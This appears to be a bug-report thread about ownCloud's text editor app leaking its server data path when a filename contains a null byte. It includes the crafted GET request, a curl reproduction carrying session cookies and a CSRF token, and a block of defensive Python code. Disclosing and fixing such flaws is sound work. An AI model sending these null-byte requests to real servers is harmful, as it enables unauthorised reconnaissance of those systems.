files_texteditor
Requesting file with zero byte (%00) reveals local path
Hi,
we've discovered that the function loadfile
from the texteditor (stock ownCloud 9.1.6.2) can be used to make ownCloud reveal the local path to the files stored for the user by requesting a file with a null byte (encoded as `%00`):
```
GET /apps/files_texteditor/ajax/loadfile?filename=invalid.txt%00&dir=%2F HTTP/1.1
Host: owncloud.invalid:5443
[...]
```
The server's response then includes the local path:
```
HTTP/1.1 400 Bad request
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 07 Aug 2017 12:07:11 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 171
[...]
{"message":"Following symlinks is not allowed ('\/var\/www\/owncloud\/data\/user1\/files\/invalid.txt\u0000' -\u003E '' not inside '\/var\/www\/owncloud\/data\/user1\/')"}
```
I apologize if this is the wrong repository to report this issue to, but I did not find any better. Please let me know if you need any additional information.
Thanks!
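As an added illustration (not code from files_texteditor or ownCloud), the defensive pattern that closes this class of disclosure, written in Python: reject NUL and other control characters in the `filename` and `dir` parameters before any path is built, confine the resolved path to the user's own tree, and hand the client only a generic message while the absolute path goes to the server log. The data root, user names and sample file tree are constructed for the demo.

```python
import logging
import os
import re
import tempfile
from typing import Optional

log = logging.getLogger("loadfile")

# Constructed sample data root; a real deployment uses its configured directory.
DATA_ROOT = "/srv/owncloud-data"

# NUL (0x00) and other control characters never belong in a file or directory name.
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def validate_filename(filename: str) -> Optional[str]:
    """Return None when the name is acceptable, otherwise a generic rejection reason.

    Runs before any path is built, so a bad name is refused without touching
    the filesystem and without a filesystem error to echo back to the client.
    """
    if not filename or filename in (".", ".."):
        return "invalid filename"
    if _CONTROL.search(filename) or "/" in filename or "\\" in filename:
        return "invalid filename"
    return None


def resolve_user_file(user: str, directory: str, filename: str,
                      data_root: str = DATA_ROOT) -> str:
    """Resolve filename under <data_root>/<user>/files/<directory>.

    Raises ValueError(reason, http_status). The absolute path is logged only;
    the client sees just the generic reason.
    """
    reason = validate_filename(filename)
    if reason:
        raise ValueError(reason, 400)
    if _CONTROL.search(directory):
        raise ValueError("invalid directory", 400)
    user_root = os.path.realpath(os.path.join(data_root, user, "files"))
    candidate = os.path.realpath(
        os.path.join(user_root, directory.lstrip("/"), filename))
    # realpath() also resolves symlinks, so a link pointing outside is caught here.
    if os.path.commonpath([user_root, candidate]) != user_root:
        log.warning("path escape attempt by %s: %r -> %r", user, filename, candidate)
        raise ValueError("file not found", 404)
    return candidate


def load_file_response(user: str, directory: str, filename: str,
                       data_root: str = DATA_ROOT) -> dict:
    """Minimal loadfile handler: returns a dict with HTTP status and JSON body."""
    try:
        path = resolve_user_file(user, directory, filename, data_root)
    except ValueError as exc:
        reason, status = exc.args
        return {"status": status, "body": {"message": reason}}
    try:
        with open(path, "r", encoding="utf-8") as fh:
            return {"status": 200, "body": {"filecontents": fh.read()}}
    except OSError as exc:
        # OS errors carry absolute paths in their text: log them, never return them.
        log.warning("loadfile failed for %s: %s", user, exc)
        return {"status": 404, "body": {"message": "file not found"}}


def demo() -> dict:
    """Build a throwaway data tree (constructed input) and exercise the handler."""
    with tempfile.TemporaryDirectory() as root:
        notes = os.path.join(root, "user1", "files", "Notizen")
        os.makedirs(notes)
        with open(os.path.join(notes, "foo.txt"), "w", encoding="utf-8") as fh:
            fh.write("hello")
        return {
            "ok": load_file_response("user1", "/Notizen", "foo.txt", root),
            "nul": load_file_response("user1", "/", "invalid.txt\x00", root),
            "nul_dir": load_file_response("user1", "/\x00", "foo.txt", root),
            "escape": load_file_response("user1", "/../../", "foo.txt", root),
            "missing": load_file_response("user1", "/Notizen", "nope.txt", root),
            "root": root,
        }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The two checks are deliberately separate: input validation rejects the NUL before any path exists, and the response layer never forwards exception text, so even a check that is bypassed later cannot leak the data directory the way the error in the report above does.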
I'm not able to repeat this. When I try, I get the following response back: `{"message":"CSRF check failed"}`.
Thanks for the feedback. You need to pass the CSRF token in the HTTP header `requesttoken`, like this:
```
$ curl -H 'Cookie: oc_sessionPassphrase=%2B8YOTmcpcZ8ATY%2BmTfYiVlnbNZlG50wTyxu3MpPB68RRJQxAK4XazjPbgz48ImMHf%2BBEFI2yjR45I3bkw4x6OqB7t7BusaagCd8DuEMRYZW2HDNIs4XMGUBjWNIklV%2Fm; 507ab8fb588da=6f8ab2pc36a5uv3k90l25bg0l7' \
    -H 'OCS-APIREQUEST: true' \
    -H 'requesttoken: BRItFlEGDlNmNUAhC3k5HAJkIXEgFyo7cUhbYTA0DTI=:SDgwaA8aWB5UoIHw1+L8LoRSH98NCBDpiMJ6AIxzfIg=' \
    'https://example.com/index.php/apps/files_texteditor/ajax/loadfile?filename=foo.txt%00&dir=%2FNotizen'
{"message":"Following symlinks is not allowed ('\/var\/www\/owncloud\/data\/fd0\/files\/Notizen\/foo.txt\u0000' -\u003E '' not inside '\/var\/www\/owncloud\/data\/fd0\/')"}
```
(Real example, I've just replaced the domain name).
That's with 10.0.4 by the way.
@tomneedham, are you still chasing this?